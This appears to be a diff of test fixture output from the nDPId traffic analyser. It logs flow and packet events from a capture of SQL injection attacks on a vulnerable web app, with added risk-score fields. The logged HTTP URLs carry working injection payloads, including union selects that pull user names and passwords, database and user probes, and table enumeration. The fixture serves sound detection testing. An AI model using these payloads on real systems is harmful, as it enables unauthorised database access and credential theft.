 00478{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":43,"source":"WebattackSQLinj.pcap","alias":"nDPId-test","flow_id":5,"flow_packet_id":1,"flow_last_seen":1499348467295,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"ts_msec":1499348467295,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8NrBAAD4GjyCsEAABwKgKMo1sAFAXzJbWAAAAAKACchCBAAAAAgQFtAQCCAoBPqBmAAAAAAEDAwc="}
 00478{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":44,"source":"WebattackSQLinj.pcap","alias":"nDPId-test","flow_id":5,"flow_packet_id":2,"flow_last_seen":1499348467295,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"ts_msec":1499348467295,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQjWwuedQjF8yW16AScSAJgQAAAgQFtAQCCAoD6HHZAT6gZgEDAwc="}
 00466{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":45,"source":"WebattackSQLinj.pcap","alias":"nDPId-test","flow_id":5,"flow_packet_id":3,"flow_last_seen":1499348467296,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"ts_msec":1499348467296,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0NrFAAD4GjyesEAABwKgKMo1sAFAXzJbXLnnUJIAQAOWoiAAAAQEICgE+oGYD6HHZ"}
-00935{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":46,"source":"WebattackSQLinj.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1499348467295,"flow_last_seen":1499348467296,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":599,"flow_tot_l4_payload_len":599,"flow_avg_l4_payload_len":149,"midstream":0,"ts_msec":1499348467296,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":36204,"dst_port":80,"l4_proto":"tcp","ndpi": {"flow_risk": {"12":"HTTP Numeric IP Address"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"205.174.165.68","url":"205.174.165.68\/dv\/vulnerabilities\/sqli\/?id=1%27+and+1%3D1+union+select+user%2C+password+from+users%23&Submit=Submit","code":0,"content_type":"","user_agent":"Mozilla\/5.0 (X11; Linux x86_64; rv:45.0) Gecko\/20100101 Firefox\/45.0"}}
+01041{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":46,"source":"WebattackSQLinj.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1499348467295,"flow_last_seen":1499348467296,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":599,"flow_tot_l4_payload_len":599,"flow_avg_l4_payload_len":149,"midstream":0,"ts_msec":1499348467296,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":36204,"dst_port":80,"l4_proto":"tcp","ndpi": {"flow_risk": {"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"205.174.165.68","url":"205.174.165.68\/dv\/vulnerabilities\/sqli\/?id=1%27+and+1%3D1+union+select+user%2C+password+from+users%23&Submit=Submit","code":0,"content_type":"","user_agent":"Mozilla\/5.0 (X11; Linux x86_64; rv:45.0) Gecko\/20100101 Firefox\/45.0"}}
 00574{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":53,"source":"WebattackSQLinj.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499348480992,"flow_last_seen":1499348480992,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499348480992,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":36206,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00478{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":53,"source":"WebattackSQLinj.pcap","alias":"nDPId-test","flow_id":6,"flow_packet_id":1,"flow_last_seen":1499348480992,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"ts_msec":1499348480992,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8IqhAAD4GoyisEAABwKgKMo1uAFBrxY9uAAAAAKACchAnDQAAAgQFtAQCCAoBPq3GAAAAAAEDAwc="}
 00478{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":54,"source":"WebattackSQLinj.pcap","alias":"nDPId-test","flow_id":6,"flow_packet_id":2,"flow_last_seen":1499348480992,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"ts_msec":1499348480992,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQjW5ct+zHa8WPb6AScSBbSwAAAgQFtAQCCAoD6H85AT6txgEDAwc="}
 00466{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":55,"source":"WebattackSQLinj.pcap","alias":"nDPId-test","flow_id":6,"flow_packet_id":3,"flow_last_seen":1499348480993,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"ts_msec":1499348480993,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0IqlAAD4Goy+sEAABwKgKMo1uAFBrxY9vXLfsyIAQAOX6UQAAAQEICgE+rccD6H85"}
-00881{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":56,"source":"WebattackSQLinj.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1499348480992,"flow_last_seen":1499348480993,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":523,"flow_tot_l4_payload_len":523,"flow_avg_l4_payload_len":130,"midstream":0,"ts_msec":1499348480993,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":36206,"dst_port":80,"l4_proto":"tcp","ndpi": {"flow_risk": {"12":"HTTP Numeric IP Address"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"205.174.165.68","url":"205.174.165.68\/dv\/vulnerabilities\/sqli\/?id=1%27&Submit=Submit","code":0,"content_type":"","user_agent":"Mozilla\/5.0 (X11; Linux x86_64; rv:45.0) Gecko\/20100101 Firefox\/45.0"}}
+00987{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":56,"source":"WebattackSQLinj.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1499348480992,"flow_last_seen":1499348480993,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":523,"flow_tot_l4_payload_len":523,"flow_avg_l4_payload_len":130,"midstream":0,"ts_msec":1499348480993,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":36206,"dst_port":80,"l4_proto":"tcp","ndpi": {"flow_risk": {"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"205.174.165.68","url":"205.174.165.68\/dv\/vulnerabilities\/sqli\/?id=1%27&Submit=Submit","code":0,"content_type":"","user_agent":"Mozilla\/5.0 (X11; Linux x86_64; rv:45.0) Gecko\/20100101 Firefox\/45.0"}}
 00574{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":63,"source":"WebattackSQLinj.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499348494345,"flow_last_seen":1499348494345,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499348494345,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":36208,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00478{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":63,"source":"WebattackSQLinj.pcap","alias":"nDPId-test","flow_id":7,"flow_packet_id":1,"flow_last_seen":1499348494345,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"ts_msec":1499348494345,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8SndAAD4Ge1msEAABwKgKMo1wAFAblvCmAAAAAKACchAI9wAAAgQFtAQCCAoBPrrRAAAAAAEDAwc="}
 00478{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":64,"source":"WebattackSQLinj.pcap","alias":"nDPId-test","flow_id":7,"flow_packet_id":2,"flow_last_seen":1499348494345,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"ts_msec":1499348494345,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQjXBGdqbdG5bwp6AScSCMVgAAAgQFtAQCCAoD6IxDAT660QEDAwc="}
 00466{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":65,"source":"WebattackSQLinj.pcap","alias":"nDPId-test","flow_id":7,"flow_packet_id":3,"flow_last_seen":1499348494346,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"ts_msec":1499348494346,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0SnhAAD4Ge2CsEAABwKgKMo1wAFAblvCnRnam3oAQAOUrXgAAAQEICgE+utED6IxD"}
-00894{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":66,"source":"WebattackSQLinj.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1499348494345,"flow_last_seen":1499348494346,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":536,"flow_tot_l4_payload_len":536,"flow_avg_l4_payload_len":134,"midstream":0,"ts_msec":1499348494346,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":36208,"dst_port":80,"l4_proto":"tcp","ndpi": {"flow_risk": {"12":"HTTP Numeric IP Address"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"205.174.165.68","url":"205.174.165.68\/dv\/vulnerabilities\/sqli\/?id=1%27+and+1%3D1%23&Submit=Submit","code":0,"content_type":"","user_agent":"Mozilla\/5.0 (X11; Linux x86_64; rv:45.0) Gecko\/20100101 Firefox\/45.0"}}
+01000{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":66,"source":"WebattackSQLinj.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1499348494345,"flow_last_seen":1499348494346,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":536,"flow_tot_l4_payload_len":536,"flow_avg_l4_payload_len":134,"midstream":0,"ts_msec":1499348494346,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":36208,"dst_port":80,"l4_proto":"tcp","ndpi": {"flow_risk": {"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"205.174.165.68","url":"205.174.165.68\/dv\/vulnerabilities\/sqli\/?id=1%27+and+1%3D1%23&Submit=Submit","code":0,"content_type":"","user_agent":"Mozilla\/5.0 (X11; Linux x86_64; rv:45.0) Gecko\/20100101 Firefox\/45.0"}}
 00574{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":73,"source":"WebattackSQLinj.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499348506489,"flow_last_seen":1499348506489,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499348506489,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":36210,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00478{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":73,"source":"WebattackSQLinj.pcap","alias":"nDPId-test","flow_id":8,"flow_packet_id":1,"flow_last_seen":1499348506489,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"ts_msec":1499348506489,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8gghAAD4GQ8isEAABwKgKMo1yAFDHw0SlAAAAAKACchD87AAAAgQFtAQCCAoBPsatAAAAAAEDAwc="}
 00479{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":74,"source":"WebattackSQLinj.pcap","alias":"nDPId-test","flow_id":8,"flow_packet_id":2,"flow_last_seen":1499348506489,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"ts_msec":1499348506489,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQjXIW0CP4x8NEpqAScSAm\/AAAAgQFtAQCCAoD6JgfAT7GrQEDAwc="}
 00466{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":75,"source":"WebattackSQLinj.pcap","alias":"nDPId-test","flow_id":8,"flow_packet_id":3,"flow_last_seen":1499348506490,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"ts_msec":1499348506490,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0gglAAD4GQ8+sEAABwKgKMo1yAFDHw0SmFtAj+YAQAOXGAwAAAQEICgE+xq0D6Jgf"}
-00936{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":76,"source":"WebattackSQLinj.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1499348506489,"flow_last_seen":1499348506490,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":537,"flow_tot_l4_payload_len":537,"flow_avg_l4_payload_len":134,"midstream":0,"ts_msec":1499348506490,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":36210,"dst_port":80,"l4_proto":"tcp","ndpi": {"flow_risk": {"12":"HTTP Numeric IP Address"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"205.174.165.68","url":"205.174.165.68\/dv\/vulnerabilities\/sqli\/?id=1%27+and+1%3D1+union+select+database%28%29%2C+user%28%29%23&Submit=Submit","code":0,"content_type":"","user_agent":"Mozilla\/5.0 (X11; Linux x86_64; rv:45.0) Gecko\/20100101 Firefox\/45.0"}}
+01042{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":76,"source":"WebattackSQLinj.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1499348506489,"flow_last_seen":1499348506490,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":537,"flow_tot_l4_payload_len":537,"flow_avg_l4_payload_len":134,"midstream":0,"ts_msec":1499348506490,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":36210,"dst_port":80,"l4_proto":"tcp","ndpi": {"flow_risk": {"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"205.174.165.68","url":"205.174.165.68\/dv\/vulnerabilities\/sqli\/?id=1%27+and+1%3D1+union+select+database%28%29%2C+user%28%29%23&Submit=Submit","code":0,"content_type":"","user_agent":"Mozilla\/5.0 (X11; Linux x86_64; rv:45.0) Gecko\/20100101 Firefox\/45.0"}}
 00574{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":83,"source":"WebattackSQLinj.pcap","alias":"nDPId-test","flow_id":9,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499348514064,"flow_last_seen":1499348514064,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499348514064,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":36212,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00478{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":83,"source":"WebattackSQLinj.pcap","alias":"nDPId-test","flow_id":9,"flow_packet_id":1,"flow_last_seen":1499348514064,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"ts_msec":1499348514064,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8tHhAAD4GEVisEAABwKgKMo10AFC7kHpqAAAAAKACchDL8wAAAgQFtAQCCAoBPs4SAAAAAAEDAwc="}
 00478{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":84,"source":"WebattackSQLinj.pcap","alias":"nDPId-test","flow_id":9,"flow_packet_id":2,"flow_last_seen":1499348514064,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"ts_msec":1499348514064,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQjXSy4nMxu5B6a6AScSADUQAAAgQFtAQCCAoD6J+FAT7OEgEDAwc="}
 00466{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":85,"source":"WebattackSQLinj.pcap","alias":"nDPId-test","flow_id":9,"flow_packet_id":3,"flow_last_seen":1499348514065,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"ts_msec":1499348514065,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0tHlAAD4GEV+sEAABwKgKMo10AFC7kHprsuJzMoAQAOWiVwAAAQEICgE+zhMD6J+F"}
-00957{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":86,"source":"WebattackSQLinj.pcap","alias":"nDPId-test","flow_id":9,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1499348514064,"flow_last_seen":1499348514065,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":600,"flow_tot_l4_payload_len":600,"flow_avg_l4_payload_len":150,"midstream":0,"ts_msec":1499348514065,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":36212,"dst_port":80,"l4_proto":"tcp","ndpi": {"flow_risk": {"12":"HTTP Numeric IP Address"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"205.174.165.68","url":"205.174.165.68\/dv\/vulnerabilities\/sqli\/?id=1%27+and+1%3D1+union+select+null%2C+table_name+from+information_schema.tables%23&Submit=Submit","code":0,"content_type":"","user_agent":"Mozilla\/5.0 (X11; Linux x86_64; rv:45.0) Gecko\/20100101 Firefox\/45.0"}}
-00693{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":94,"source":"WebattackSQLinj.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":11,"flow_first_seen":1499348407419,"flow_last_seen":1499348412425,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":530,"flow_tot_l4_payload_len":977,"flow_avg_l4_payload_len":88,"midstream":0,"ts_msec":1499348519077,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":36196,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"12":"HTTP Numeric IP Address"},"proto":"HTTP","breed":"Acceptable","category":"Web"}}
-00696{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":94,"source":"WebattackSQLinj.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"finished","flow_packets_processed":10,"flow_first_seen":1499348413192,"flow_last_seen":1499348418262,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1840,"flow_tot_l4_payload_len":2300,"flow_avg_l4_payload_len":230,"midstream":0,"ts_msec":1499348519077,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":36198,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"12":"HTTP Numeric IP Address"},"proto":"HTTP","breed":"Acceptable","category":"Web"}}
-00696{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":94,"source":"WebattackSQLinj.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"finished","flow_packets_processed":10,"flow_first_seen":1499348422024,"flow_last_seen":1499348427063,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1881,"flow_tot_l4_payload_len":2418,"flow_avg_l4_payload_len":241,"midstream":0,"ts_msec":1499348519077,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":36200,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"12":"HTTP Numeric IP Address"},"proto":"HTTP","breed":"Acceptable","category":"Web"}}
-00696{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":94,"source":"WebattackSQLinj.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"finished","flow_packets_processed":11,"flow_first_seen":1499348433464,"flow_last_seen":1499348438551,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":4149,"flow_tot_l4_payload_len":4749,"flow_avg_l4_payload_len":431,"midstream":0,"ts_msec":1499348519077,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":36202,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"12":"HTTP Numeric IP Address"},"proto":"HTTP","breed":"Acceptable","category":"Web"}}
-00696{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":94,"source":"WebattackSQLinj.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"finished","flow_packets_processed":10,"flow_first_seen":1499348467295,"flow_last_seen":1499348472302,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":2021,"flow_tot_l4_payload_len":2620,"flow_avg_l4_payload_len":262,"midstream":0,"ts_msec":1499348519077,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":36204,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"12":"HTTP Numeric IP Address"},"proto":"HTTP","breed":"Acceptable","category":"Web"}}
-00695{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":94,"source":"WebattackSQLinj.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"finished","flow_packets_processed":10,"flow_first_seen":1499348480992,"flow_last_seen":1499348486002,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":530,"flow_tot_l4_payload_len":1053,"flow_avg_l4_payload_len":105,"midstream":0,"ts_msec":1499348519077,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":36206,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"12":"HTTP Numeric IP Address"},"proto":"HTTP","breed":"Acceptable","category":"Web"}}
-00696{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":94,"source":"WebattackSQLinj.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"finished","flow_packets_processed":10,"flow_first_seen":1499348494345,"flow_last_seen":1499348499355,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1840,"flow_tot_l4_payload_len":2376,"flow_avg_l4_payload_len":237,"midstream":0,"ts_msec":1499348519077,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":36208,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"12":"HTTP Numeric IP Address"},"proto":"HTTP","breed":"Acceptable","category":"Web"}}
-00696{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":94,"source":"WebattackSQLinj.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"finished","flow_packets_processed":10,"flow_first_seen":1499348506489,"flow_last_seen":1499348511497,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1881,"flow_tot_l4_payload_len":2418,"flow_avg_l4_payload_len":241,"midstream":0,"ts_msec":1499348519077,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":36210,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"12":"HTTP Numeric IP Address"},"proto":"HTTP","breed":"Acceptable","category":"Web"}}
-00696{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":94,"source":"WebattackSQLinj.pcap","alias":"nDPId-test","flow_id":9,"flow_state":"finished","flow_packets_processed":12,"flow_first_seen":1499348514064,"flow_last_seen":1499348519077,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":2701,"flow_tot_l4_payload_len":4749,"flow_avg_l4_payload_len":395,"midstream":0,"ts_msec":1499348519077,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":36212,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"12":"HTTP Numeric IP Address"},"proto":"HTTP","breed":"Acceptable","category":"Web"}}
+01063{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":86,"source":"WebattackSQLinj.pcap","alias":"nDPId-test","flow_id":9,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1499348514064,"flow_last_seen":1499348514065,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":600,"flow_tot_l4_payload_len":600,"flow_avg_l4_payload_len":150,"midstream":0,"ts_msec":1499348514065,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":36212,"dst_port":80,"l4_proto":"tcp","ndpi": {"flow_risk": {"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"205.174.165.68","url":"205.174.165.68\/dv\/vulnerabilities\/sqli\/?id=1%27+and+1%3D1+union+select+null%2C+table_name+from+information_schema.tables%23&Submit=Submit","code":0,"content_type":"","user_agent":"Mozilla\/5.0 (X11; Linux x86_64; rv:45.0) Gecko\/20100101 Firefox\/45.0"}}
